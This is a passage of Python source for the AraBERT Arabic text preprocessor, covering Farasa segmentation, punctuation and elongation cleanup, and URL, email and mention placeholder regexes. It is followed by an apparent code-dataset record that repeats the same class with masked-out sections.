emoji_regex = "".join(list(self.emoji.UNICODE_EMOJI["en"].keys()))
rejected_chars_regex2 = "[^%s%s]" % (chars_regex, emoji_regex)
text = re.sub(rejected_chars_regex2, " ", text)
else:
text = re.sub(rejected_chars_regex, " ", text)
# remove extra spaces
text = " ".join(text.replace("\uFE0F", "").split())
if (
self.model_name == "bert-base-arabertv2"
or self.model_name == "bert-large-arabertv2"
):
if self.keep_emojis:
new_text = []
for word in text.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
new_text.append(word)
else:
new_text.append(self.farasa_segmenter.segment(word))
text = " ".join(new_text)
else:
text = self.farasa_segmenter.segment(text)
return self._farasa_segment(text)
# ALl the other models dont require Farasa Segmentation
return text
def unpreprocess(self, text, desegment=True):
"""Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.
The objective is to make the generated text of any model appear natural and not preprocessed.
Args:
text (str): input text to be un-preprocessed
desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.
Returns:
str: The unpreprocessed (and possibly Farasa-desegmented) text.
"""
if self.model_name in SEGMENTED_MODELS and desegment:
text = self.desegment(text)
# removes the spaces around quotation marks ex: i " ate " an apple --> i "ate" an apple
# https://stackoverflow.com/a/53436792/5381220
text = re.sub(white_spaced_double_quotation_regex, '"' + r"\1" + '"', text)
text = re.sub(white_spaced_single_quotation_regex, "'" + r"\1" + "'", text)
text = re.sub(white_spaced_back_quotation_regex, "\`" + r"\1" + "\`", text)
text = re.sub(white_spaced_back_quotation_regex, "\—" + r"\1" + "\—", text)
# during generation, sometimes the models don't put a space after the dot, this handles it
text = text.replace(".", " . ")
text = " ".join(text.split())
# handle decimals
text = re.sub(r"(\d+) \. (\d+)", r"\1.\2", text)
text = re.sub(r"(\d+) \, (\d+)", r"\1,\2", text)
text = re.sub(left_and_right_spaced_chars, r"\1", text)
text = re.sub(left_spaced_chars, r"\1", text)
text = re.sub(right_spaced_chars, r"\1", text)
return text
def desegment(self, text):
"""
Use this function if sentence tokenization was done using
`from arabert.preprocess_arabert import preprocess` with Farasa enabled
AraBERT segmentation using Farasa adds a space after the '+' for prefixes,
and after before the '+' for suffixes
Example:
>>> desegment('ال+ دراس +ات')
الدراسات
"""
text = text.replace("+ ", "+")
text = text.replace(" +", "+")
text = " ".join([self._desegmentword(word) for word in text.split(" ")])
return text
def _desegmentword(self, orig_word: str) -> str:
"""
Word segmentor that takes a Farasa Segmented Word and removes the '+' signs
Example:
>>> _desegmentword("ال+يومي+ة")
اليومية
"""
word = orig_word.replace("ل+ال+", "لل")
if "ال+ال" not in orig_word:
word = word.replace("ل+ال", "لل")
word = word.replace("+", "")
word = word.replace("للل", "لل")
return word
def _old_preprocess(self, text, do_farasa_tokenization):
"""
AraBERTv1 preprocessing Function
"""
text = str(text)
if self.strip_tashkeel:
text = araby.strip_tashkeel(text)
text = re.sub(r"\d+\/[ء-ي]+\/\d+\]", "", text)
text = re.sub("ـ", "", text)
text = re.sub("[«»]", ' " ', text)
if self.replace_urls_emails_mentions:
# replace the [رابط] token with space if you want to clean links
text = re.sub(regex_url_step1, "[رابط]", text)
text = re.sub(regex_url_step2, "[رابط]", text)
text = re.sub(regex_url, "[رابط]", text)
text = re.sub(regex_email, "[بريد]", text)
text = re.sub(regex_mention, "[مستخدم]", text)
text = re.sub("…", r"\.", text).strip()
text = self._remove_redundant_punct(text)
if self.replace_urls_emails_mentions:
text = re.sub(r"\[ رابط \]|\[ رابط\]|\[رابط \]", " [رابط] ", text)
text = re.sub(r"\[ بريد \]|\[ بريد\]|\[بريد \]", " [بريد] ", text)
text = re.sub(r"\[ مستخدم \]|\[ مستخدم\]|\[مستخدم \]", " [مستخدم] ", text)
if self.remove_elongation:
text = self._remove_elongation(text)
if self.insert_white_spaces:
text = re.sub(
"([^0-9\u0621-\u063A\u0641-\u0669\u0671-\u0673a-zA-Z\[\]])",
r" \1 ",
text,
)
if do_farasa_tokenization:
text = self._tokenize_arabic_words_farasa(text)
return text.strip()
def _farasa_segment(self, text):
line_farasa = text.split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
if "+" not in word:
segmented_line.append(word)
continue
segmented_word = self._split_farasa_output(word)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _split_farasa_output(self, word):
segmented_word = []
temp_token = ""
for i, c in enumerate(word):
if c == "+":
# if the token is KAF, it could be a suffix or prefix
if temp_token == "ك":
# if we are at the second token, then KAF is surely a prefix
if i == 1:
segmented_word.append(temp_token + "+")
temp_token = ""
# If the KAF token is between 2 tokens
elif word[i - 2] == "+":
# if the previous token is prefix, then this KAF must be a prefix
if segmented_word[-1][-1] == "+":
segmented_word.append(temp_token + "+")
temp_token = ""
# else it is a suffix, this KAF could not be a second suffix
else:
segmented_word.append("+" + temp_token)
temp_token = ""
# if Kaf is at the end, this is handled with the statement after the loop
elif temp_token in prefix_list:
segmented_word.append(temp_token + "+")
temp_token = ""
elif temp_token in suffix_list:
segmented_word.append("+" + temp_token)
temp_token = ""
else:
segmented_word.append(temp_token)
temp_token = ""
continue
temp_token += c
if temp_token != "":
if temp_token in suffix_list:
segmented_word.append("+" + temp_token)
else:
segmented_word.append(temp_token)
return segmented_word
def _tokenize_arabic_words_farasa(self, line_input):
if self.keep_emojis:
# insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets
line_farasa = []
for word in line_input.split():
if word in list(self.emoji.UNICODE_EMOJI["en"].keys()):
line_farasa.append(word)
else:
line_farasa.append(self.farasa_segmenter.segment(word))
else:
line_farasa = self.farasa_segmenter.segment(line_input).split()
segmented_line = []
for index, word in enumerate(line_farasa):
if word in ["[", "]"]:
continue
if word in ["رابط", "بريد", "مستخدم"] and line_farasa[index - 1] in [
"[",
"]",
]:
segmented_line.append("[" + word + "]")
continue
segmented_word = []
for token in word.split("+"):
if token in prefix_list:
segmented_word.append(token + "+")
elif token in suffix_list:
segmented_word.append("+" + token)
else:
segmented_word.append(token)
segmented_line.extend(segmented_word)
return " ".join(segmented_line)
def _remove_elongation(self, text):
"""
:param text: the input text to remove elongation
:return: delongated text
"""
# loop over the number of times the regex matched the text
for index_ in range(len(re.findall(regex_tatweel, text))):
elongation = re.search(regex_tatweel, text)
if elongation:
elongation_pattern = elongation.group()
elongation_replacement = elongation_pattern[0]
elongation_pattern = re.escape(elongation_pattern)
text = re.sub(
elongation_pattern, elongation_replacement, text, flags=re.MULTILINE
)
else:
break
return text
def _remove_redundant_punct(self, text):
text_ = text
result = re.search(redundant_punct_pattern, text)
dif = 0
while result:
sub = result.group()
sub = sorted(set(sub), key=sub.index)
sub = " " + "".join(list(sub)) + " "
text = "".join(
(text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])
)
text_ = "".join(
(text_[: result.span()[0]], text_[result.span()[1] :])
).strip()
dif = abs(len(text) - len(text_))
result = re.search(redundant_punct_pattern, text_)
text = re.sub(r"\s+", " ", text)
return text.strip()
prefix_list = [
"ال",
"و",
"ف",
"ب",
"ك",
"ل",
"لل",
"\u0627\u0644",
"\u0648",
"\u0641",
"\u0628",
"\u0643",
"\u0644",
"\u0644\u0644",
"س",
]
suffix_list = [
"ه",
"ها",
"ك",
"ي",
"هما",
"كما",
"نا",
"كم",
"هم",
"هن",
"كن",
"ا",
"ان",
"ين",
"ون",
"وا",
"ات",
"ت",
"ن",
"ة",
"\u0647",
"\u0647\u0627",
"\u0643",
"\u064a",
"\u0647\u0645\u0627",
"\u0643\u0645\u0627",
"\u0646\u0627",
"\u0643\u0645",
"\u0647\u0645",
"\u0647\u0646",
"\u0643\u0646",
"\u0627",
"\u0627\u0646",
"\u064a\u0646",
"\u0648\u0646",
"\u0648\u0627",
"\u0627\u062a",
"\u062a",
"\u0646",
"\u0629",
]
other_tokens = ["[رابط]", "[مستخدم]", "[بريد]"]
# the never_split list is ussed with the transformers library
prefix_symbols = [x + "+" for x in prefix_list]
suffix_symblos = ["+" + x for x in suffix_list]
never_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))
url_regexes = [
r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)",
r"@(https?|ftp)://(-\.)?([^\s/?\.#-]+\.?)+(/[^\s]*)?$@iS",
r"http[s]?://[a-zA-Z0-9_\-./~\?=%&]+",
r"www[a-zA-Z0-9_\-?=%&/.~]+",
r"[a-zA-Z]+\.com",
r"(?=http)[^\s]+",
r"(?=www)[^\s]+",
r"://",
]
user_mention_regex = r"@[\w\d]+"
email_regexes = [r"[\w-]+@([\w-]+\.)+[\w-]+", r"\S+@\S+"]
redundant_punct_pattern = (
r"([!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ【»؛\s+«–…‘]{2,})"
)
regex_tatweel = r"(\D)\1{2,}"
rejected_chars_regex = r"[^0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘]"
regex_url_step1 = r"(?=http)[^\s]+"
regex_url_step2 = r"(?=www)[^\s]+"
regex_url = r"(http(s)?:\/\/.)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)"
regex_mention = r"@[\w\d]+"
regex_email = r"\S+@\S+"
chars_regex = r"0-9\u0621-\u063A\u0640-\u066C\u0671-\u0674a-zA-Z\[\]!\"#\$%\'\(\)\*\+,\.:;\-<=·>?@\[\\\]\^_ـ`{\|}~—٪’،؟`୍“؛”ۚ»؛\s+«–…‘"
white_spaced_double_quotation_regex = r'\"\s+([^"]+)\s+\"'
white_spaced_single_quotation_regex = r"\'\s+([^']+)\s+\'"
white_spaced_back_quotation_regex = r"\`\s+([^`]+)\s+\`"
white_spaced_em_dash = r"\—\s+([^—]+)\s+\—"
left_spaced_chars = r" ([\]!#\$%\),\.:;\?}٪’،؟”؛…»·])"
right_spaced_chars = r"([\[\(\{“«‘*\~]) "
left_and_right_spaced_chars = r" ([\+\-\<\=\>\@\\\^\_\|\–]) "
|
normal
|
{
"blob_id": "6c3f60f05adbebe521ba08d7a7e9fc10b1cc914f",
"index": 2907,
"step-1": "<mask token>\n\n\nclass ArbertmoPreprocessor:\n <mask token>\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(self, model_name, keep_emojis=False, remove_html_markup=\n True, replace_urls_emails_mentions=True, strip_tashkeel=True,\n strip_tatweel=True, insert_white_spaces=True, remove_elongation=True):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace('aubmindlab/', '')\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = 'bert-base-arabertv02'\n else:\n self.model_name = model_name\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n 'Selected Model requires pre-segmentation, Initializing FarasaSegmenter'\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n 'farasapy is not installed, you want be able to process text for AraBERTv1 and v2. Install it using: pip install farasapy'\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n 'Keeping tweets with Farasa Segmentation is 10 times slower'\n )\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == 'bert-base-arabert':\n return self._old_preprocess(text, do_farasa_tokenization=True)\n if self.model_name == 'bert-base-arabertv01':\n return self._old_preprocess(text, do_farasa_tokenization=False)\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n if self.replace_urls_emails_mentions:\n for reg in url_regexes:\n text = re.sub(reg, ' [رابط] ', text)\n for reg in email_regexes:\n text = re.sub(reg, ' [بريد] ', text)\n text = re.sub(user_mention_regex, ' [مستخدم] ', text)\n if self.remove_html_markup:\n text = re.sub('<br />', ' ', text)\n text = re.sub('</?[^>]+>', ' ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-ي٠-٩a-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n text = re.sub('(\\\\d+)([ء-غف-ي٠-٬]+)', ' \\\\1 \\\\2 ', text)\n text = re.sub('([ء-غف-ي٠-٬]+)(\\\\d+)', ' \\\\1 \\\\2 ', text)\n if self.keep_emojis:\n emoji_regex = ''.join(list(self.emoji.UNICODE_EMOJI['en'].keys()))\n rejected_chars_regex2 = '[^%s%s]' % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, ' ', text)\n else:\n text = re.sub(rejected_chars_regex, ' ', text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n 